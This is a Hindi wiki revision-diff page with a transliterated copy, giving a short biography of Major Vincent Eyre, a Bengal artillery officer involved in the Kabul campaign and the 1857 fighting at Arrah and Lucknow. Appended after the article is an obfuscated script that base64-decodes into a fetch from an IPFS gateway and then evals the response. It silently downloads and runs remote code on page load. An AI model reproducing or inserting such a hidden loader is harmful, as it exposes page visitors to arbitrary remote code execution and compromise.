Difference between revisions of "मेजर विनसेण्ट आयर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "1863" to "1863")
 
Line 2: Line 2:
 
*यह अफ़सर होकर 1828 ई. में [[भारत]] आया था।  
 
*यह अफ़सर होकर 1828 ई. में [[भारत]] आया था।  
 
*उसने 1839-42 ई. में [[काबुल]] पर अंग्रेज़ों के आक्रमण में भाग लिया।  
 
*उसने 1839-42 ई. में [[काबुल]] पर अंग्रेज़ों के आक्रमण में भाग लिया।  
*इसके बाद में उसका स्थानान्तरण [[बर्मा]] के लिए हो गया।  
+
*इसके बाद में उसका स्थानान्तरण बर्मा (वर्तमान [[म्यांमार]]) के लिए हो गया।  
 
*जब भारत में 1857 ई. में प्रथम स्वाधीनता संग्राम छिड़ा, तो उसे फिर से वापस भारत बुला लिया गया।
 
*जब भारत में 1857 ई. में प्रथम स्वाधीनता संग्राम छिड़ा, तो उसे फिर से वापस भारत बुला लिया गया।
 
*जब वह लौट रहा था, तो उसने सुना कि जगदीशपुर के कुवँर सिंह ने आरा को घेर रखा है।  
 
*जब वह लौट रहा था, तो उसने सुना कि जगदीशपुर के कुवँर सिंह ने आरा को घेर रखा है।  
Line 9: Line 9:
 
*वह 1863 ई. में अवकाश पर चला गया।
 
*वह 1863 ई. में अवकाश पर चला गया।
  
{{प्रचार}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
[[Category:नया पन्ना]] [[Category:औपनिवेशिक काल]]
+
[[Category:औपनिवेशिक काल]]
 
[[Category:अंग्रेज़ी शासन]]
 
[[Category:अंग्रेज़ी शासन]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:21, 22 January 2013

  • mejar vinasent ayar (janm- 1811 ee.; mrityu- 1881 ee.) bangal topakhane ka afasar tha.
  • yah afasar hokar 1828 ee. mean bharat aya tha.
  • usane 1839-42 ee. mean kabul par aangrezoan ke akraman mean bhag liya.
  • isake bad mean usaka sthanantaran barma (vartaman myaanmar) ke lie ho gaya.
  • jab bharat mean 1857 ee. mean pratham svadhinata sangram chhi da, to use phir se vapas bharat bula liya gaya.
  • jab vah laut raha tha, to usane suna ki jagadishapur ke kuvanr sianh ne ara ko gher rakha hai.
  • usane apani zimmedari par sena ekatr kar kuvanrasianh ko parajit kiya.
  • isake bad vah lakhanoo gaya, jahaan usane 1858 ee. mean aangrezoan ko vijayi banane mean sahayata di.
  • vah 1863 ee. mean avakash par chala gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>